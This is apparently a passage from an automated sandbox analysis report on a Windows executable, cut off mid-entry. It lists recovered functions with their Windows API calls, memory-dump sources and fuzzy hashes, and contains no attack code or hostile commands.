VariantClear.OLEAUT32(?), ref: 00B075AB

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 3185166120c523b7d786bf60f3feee65eec45e80994865416bc6a7602cc3b3de
Instruction ID: 583b14f3aa72b5f10faf2dbaaa68d801d14508869b1ff3d0af228c63ef67076a
Opcode Fuzzy Hash: 3185166120c523b7d786bf60f3feee65eec45e80994865416bc6a7602cc3b3de
Instruction Fuzzy Hash: 15519534A887019ADB20AF799895A7DFBE5EF45350B30885FE547C72E2DE31B8408B15

Uniqueness

Uniqueness Score: -1.00%

Function 00AD492A, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AD49C0
__flush.LIBCMT ref: 00AD49E0
__write.LIBCMT ref: 00AD4A13
__flsbuf.LIBCMT ref: 00AD4A41

Part of subcall function 00AD8D58: __getptd_noexit.LIBCMT ref: 00AD8D58

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: 3e411e07f8cd75c5c61de9b6701c03a4ea1f59554bf57597d3761d4cf0072837
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: 0D419531600706ABDF288FAAC8909AF7BB5AF493A0B24817FE85787750D7709D418B44

Uniqueness

Uniqueness Score: -1.00%

Function 00B3B1A9, Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00B3B1D2
GetWindowRect.USER32 ref: 00B3B248
PtInRect.USER32(?,?,00B3C6BC), ref: 00B3B258
MessageBeep.USER32(00000000), ref: 00B3B2C9

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: bcf622e6483be428634c656ad466e4bded7716c9688d8df329c9311e45472d9b
Instruction ID: d6b5ecd3af2dd570d0fb2cf573ce88a3a95620f3baff4d31717bb99e06682a63
Opcode Fuzzy Hash: bcf622e6483be428634c656ad466e4bded7716c9688d8df329c9311e45472d9b
Instruction Fuzzy Hash: 6E415E34A041199FDF11CF59CC84EAE7BF5FF49310F2882E9EA289B259DB30A945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00AE63F5, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AE642B
__isleadbyte_l.LIBCMT ref: 00AE6459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AE6487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AE64BD

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5724b579c7e637393089db5dd74049099865b8b2fd59db24cc1588fffaeb811c
Instruction ID: 7ce396627102da7ddc5cd9115195af5544109ab094658cb7782a8a57ed3cb95e
Opcode Fuzzy Hash: 5724b579c7e637393089db5dd74049099865b8b2fd59db24cc1588fffaeb811c
Instruction Fuzzy Hash: 4B31D031600296AFDF218F66CE44BAA7FA5FF513A0F154829F864871D1EB31E950DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B3CB40, Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AB29F3

GetCursorPos.USER32(?,?,?,?,?,?,?,?,00AEBCEC,?,?,?,?,?), ref: 00B3CB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00AEBCEC,?,?,?,?,?), ref: 00B3CB8F
GetCursorPos.USER32(?,?,?,?,?,?,?,?,?,00AEBCEC,?,?,?,?,?), ref: 00B3CBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00AEBCEC,?,?,?), ref: 00B3CC16

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: e2d1d76bf416e4436507b3c34d5b4bd28be5504bfceff5d2e95fbac1cfaf54f9
Instruction ID: a2a85b56f0d56ef96fb687d895e3729c1ec07e385787593022d3f3020522a52a
Opcode Fuzzy Hash: e2d1d76bf416e4436507b3c34d5b4bd28be5504bfceff5d2e95fbac1cfaf54f9
Instruction Fuzzy Hash: 4F31BF35600058AFCB159F95C889EFABFF9FB09310F144099F909A7261DB315E50EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B09274, Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B08D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B08D3F
Part of subcall function 00B08D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B08D49
Part of subcall function 00B08D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B08D58
Part of subcall function 00B08D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B08D5F
Part of subcall function 00B08D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B08D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B092C1
_memcmp.LIBCMT ref: 00B092E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B0931A
HeapFree.KERNEL32(00000000), ref: 00B09321

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: c31f64f85088c6483f7dfc7091d129b4e53c614c753819a4aa10bf1d948b11bd
Instruction ID: 4627bc68f7033bf05803719269e3cce85687e60e74c1143b33590d606f8d21f3
Opcode Fuzzy Hash: c31f64f85088c6483f7dfc7091d129b4e53c614c753819a4aa10bf1d948b11bd
Instruction Fuzzy Hash: 71214A71E41109EFDB10DFA4C945BEEBBF8FF45301F144099E895AB292D771AA05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AD0BC0, Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00AD0BE2

Part of subcall function 00AC402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B17E51,?,?,00000000), ref: 00AC4041
Part of subcall function 00AC402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B17E51,?,?,00000000,?,?), ref: 00AC4065

_fprintf.LIBCMT ref: 00AD0C19
OutputDebugStringW.KERNEL32(?), ref: 00B0694C

Part of subcall function 00AD4CCA: _flsall.LIBCMT ref: 00AD4CE3

__setmode.LIBCMT ref: 00AD0C4E

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: bacadc2eba8acf5ef605bcf73f1cb344631e40695bd9cd48a8d4f4c34354851a
Instruction ID: 5c35012fdb34f3ce832d051aa25c97bc17f1dc445aa8fb8c29680a0f6cc42df3
Opcode Fuzzy Hash: bacadc2eba8acf5ef605bcf73f1cb344631e40695bd9cd48a8d4f4c34354851a
Instruction Fuzzy Hash: 7811D231A042046BD708B7A4AD47EFE7B6DEF49321F14015BF206A73C2DE71599297A1

Uniqueness

Uniqueness Score: -1.00%

Function 00AD5FF7, Relevance: 6.1, APIs: 4, Instructions: 67threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00AD6020
ExitThread.KERNEL32 ref: 00AD6027
__freefls@4.LIBCMT ref: 00AD6043

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorExitLastThread__freefls@4
String ID:
API String ID: 2303210795-0
Opcode ID: c76ed1bf121a867073aed1aefa28a117a250adbad2cae42682ec1a02c0deac09
Instruction ID: 752e02b5711e3af23e300d71d48638a1ac8f8ec1abf3632d289230d70d5c237d
Opcode Fuzzy Hash: c76ed1bf121a867073aed1aefa28a117a250adbad2cae42682ec1a02c0deac09
Instruction Fuzzy Hash: 07110679404245ABCB14BFB4C94664E7BE8EF04300F10C566F5458B352EF30DC85D796

Uniqueness

Uniqueness Score: -1.00%

Function 00AC5B29, Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AC5B58

Part of subcall function 00AC56F8: _memset.LIBCMT ref: 00AC5787
Part of subcall function 00AC56F8: _wcscpy.LIBCMT ref: 00AC57DB
Part of subcall function 00AC56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AC57EB

KillTimer.USER32(?,00000001,?,?), ref: 00AC5BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AC5BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B00D7C

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: e02a7177e0fdc889dd4d7942845f67ac307447b0b867187db44850eed0f3af58
Instruction ID: d2b73f581e2e84d3bacbe6f0b27dbe48cdfe2427fec55b373604572d6cf9d56f
Opcode Fuzzy Hash: e02a7177e0fdc889dd4d7942845f67ac307447b0b867187db44850eed0f3af58
Instruction Fuzzy Hash: C621F1709047849FE7729B248885FEABFECAB02304F00019DEA9A56281CB747EC4CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B096F9, Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00B09719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B0972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B09741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B0975C

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a97f9425db13138c2a46d0d28a84136bb7976fca5c8218d7426517d2e1deaa5c
Instruction ID: 8214756abf2cc1de25485294c93a9c96c4b3a2c50a3f9b8854d6882f7e971df0
Opcode Fuzzy Hash: a97f9425db13138c2a46d0d28a84136bb7976fca5c8218d7426517d2e1deaa5c
Instruction Fuzzy Hash: 5611483A901218FFEB10DF95C984E9DBBB8FB48710F204091EA04B7290DB71AE10DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AB166C, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00AB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AB29F3

DefDlgProcW.USER32(?,00000020,?), ref: 00AB16B4
GetClientRect.USER32 ref: 00AEB93C
GetCursorPos.USER32(?), ref: 00AEB946
ScreenToClient.USER32 ref: 00AEB951

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 574d02517a4642bfd06bbeeaf1bbabfe352c9596647601bd23c69bf9548b6ef3
Instruction ID: d6db2fb03f5aebc3c6c2ef494476718a98a95ee97815dbab627a351dc217977b
Opcode Fuzzy Hash: 574d02517a4642bfd06bbeeaf1bbabfe352c9596647601bd23c69bf9548b6ef3
Instruction Fuzzy Hash: CB112839A10019ABCB10EF98C8A5DFE77B8FB09301F540455FA51E7152EB34BA51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2111, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00AB214F
GetStockObject.GDI32(00000011), ref: 00AB2163
SendMessageW.USER32(00000000,00000030,00000000), ref: 00AB216D

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: c2013c7b15084838db08f7faf32daa2081fe076832a58c3c620d4bd0b2fc0e42
Instruction ID: e19f215ad48ed78c5e49f28fbd9fe5249181ed53451eb15dc1afb17c63b954a8
Opcode Fuzzy Hash: c2013c7b15084838db08f7faf32daa2081fe076832a58c3c620d4bd0b2fc0e42
Instruction Fuzzy Hash: 84118BB2111149BFDF025F94AC44EEBBB6DFF59394F050206FB0456121CB319D60DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AE71E7, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00AE720B

Part of subcall function 00AE78F2: __fltout2.LIBCMT ref: 00AE791B

__cftog_l.LIBCMT ref: 00AE7231
__cftoe_l.LIBCMT ref: 00AE7263

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 07f88b61d10dc4d34f1e3e98d00b5919513fede97c2ba8f70123a0e4f95016f1
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: B401497204818EBBCF166F86CD41CEE3F62BB29354F588515FA1858131D736C9B1AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B3BCA7, Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B3BCB6
_memset.LIBCMT ref: 00B3BCC5
CreateProcessW.KERNEL32 ref: 00B3BCF4
CloseHandle.KERNEL32 ref: 00B3BD06

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 581270c235acc4dd5053f3d70f57aae4f9a4925b87ca898130dbd48c19ef2065
Instruction ID: 3a46f2377f0bb4eb723a0228c73182d9db16568c0c4192c6bd1338d76ea4fec7
Opcode Fuzzy Hash: 581270c235acc4dd5053f3d70f57aae4f9a4925b87ca898130dbd48c19ef2065
Instruction Fuzzy Hash: C7F05EB26803047FE6503B61AC09FBB3A9DEB09750F004821FB0DDE1A2DF71495087A9

Uniqueness

Uniqueness Score: -1.00%

Function 00B3C3C4, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00AB16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB1729
Part of subcall function 00AB16CF: SelectObject.GDI32(?,00000000), ref: 00AB1738
Part of subcall function 00AB16CF: BeginPath.GDI32(?), ref: 00AB174F
Part of subcall function 00AB16CF: SelectObject.GDI32(?,00000000), ref: 00AB1778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B3C3E8
LineTo.GDI32(00000000,?,?), ref: 00B3C3F5
EndPath.GDI32(00000000), ref: 00B3C405
StrokePath.GDI32(00000000), ref: 00B3C413

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 72df74fb54da998baa541f1bed1b52863346d0a04e6d63f2861fcb0306f50513
Instruction ID: 6c9f4a20d149db7d0a177d4b9e6e05203f53eeb5a25b49fd5df2b1ce79ddd509
Opcode Fuzzy Hash: 72df74fb54da998baa541f1bed1b52863346d0a04e6d63f2861fcb0306f50513
Instruction Fuzzy Hash: F8F0BE35045218BADB226F91AC0EFCE3F99BF06310F048040FB11622E28BB41651DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00B09330, Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00B09339
OpenThreadToken.ADVAPI32(00000000,?,?,?,00B08F04), ref: 00B09340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B08F04), ref: 00B0934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,00B08F04), ref: 00B09354

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 998e0af5860fb6d8b5020cad9806a74bd04c7bbd9d9652b7d4275de55b9c0cbb
Instruction ID: 00baa04197c3d4ba418534745516d3bd6ed16106f4790969295fbb40d44791c1
Opcode Fuzzy Hash: 998e0af5860fb6d8b5020cad9806a74bd04c7bbd9d9652b7d4275de55b9c0cbb
Instruction Fuzzy Hash: 3DE0863A6112119FD7202FF15D0DB563FACFF56791F108858B745CB0D0EA349544CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00AD5FCC, Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00AD5FCD

Part of subcall function 00AD9BF4: GetLastError.KERNEL32(?,00AD1003,00AD8D5D,00AD59C3,?,?,00AD1003,?), ref: 00AD9BF6
Part of subcall function 00AD9BF4: __calloc_crt.LIBCMT ref: 00AD9C17
Part of subcall function 00AD9BF4: __initptd.LIBCMT ref: 00AD9C39
Part of subcall function 00AD9BF4: GetCurrentThreadId.KERNEL32 ref: 00AD9C40
Part of subcall function 00AD9BF4: SetLastError.KERNEL32(00000000,00AD1003,00AD8D5D,00AD59C3,?,?,00AD1003,?), ref: 00AD9C58

CloseHandle.KERNEL32(?,?,00AD5FAC), ref: 00AD5FE1
__freeptd.LIBCMT ref: 00AD5FE8
ExitThread.KERNEL32 ref: 00AD5FF0

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
String ID:
API String ID: 4169687693-0
Opcode ID: 7ea38d8223b5d5551868b3c95fd97b2b42e0456c619fc9222ccc95830b0d151e
Instruction ID: e3ee9b455c2b8ce46eb6615a52e95302e1b15da59e4ead66297684fd74a3c3fa
Opcode Fuzzy Hash: 7ea38d8223b5d5551868b3c95fd97b2b42e0456c619fc9222ccc95830b0d151e
Instruction Fuzzy Hash: B5D0A735402E508BC3313B78AD0DE5A36106F05B21F054207F5A79A2F08F31C9028645

Uniqueness

Uniqueness Score: -1.00%

Function 00ABE00D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00ABE01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 00ABE037

Strings

@, xrefs: 00ABE02B

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 911a2c2adcf25a0e020ceb5df8d84e1e417bc98e0cc75681d8b4487c73f5d138
Instruction ID: fc045aab02f738eda571d2c35477c6c159107f2b9bf34739a06c8556d1aca73e
Opcode Fuzzy Hash: 911a2c2adcf25a0e020ceb5df8d84e1e417bc98e0cc75681d8b4487c73f5d138
Instruction Fuzzy Hash: 43514971418B449BE320AF50E985BAFBBFCFB88315F41485DF2D8421A2DB709529CB16

Uniqueness

Uniqueness Score: -1.00%

Function 00B19CF1, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00AC4AB2: __fread_nolock.LIBCMT ref: 00AC4AD0

_wcscmp.LIBCMT ref: 00B19DE1
_wcscmp.LIBCMT ref: 00B19DF4

Strings

FILE, xrefs: 00B19D2D

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: ea3f20c07ca560f71a1bdf4c7ea599637d32e7ede2cf09a9c7255d56f4684bc8
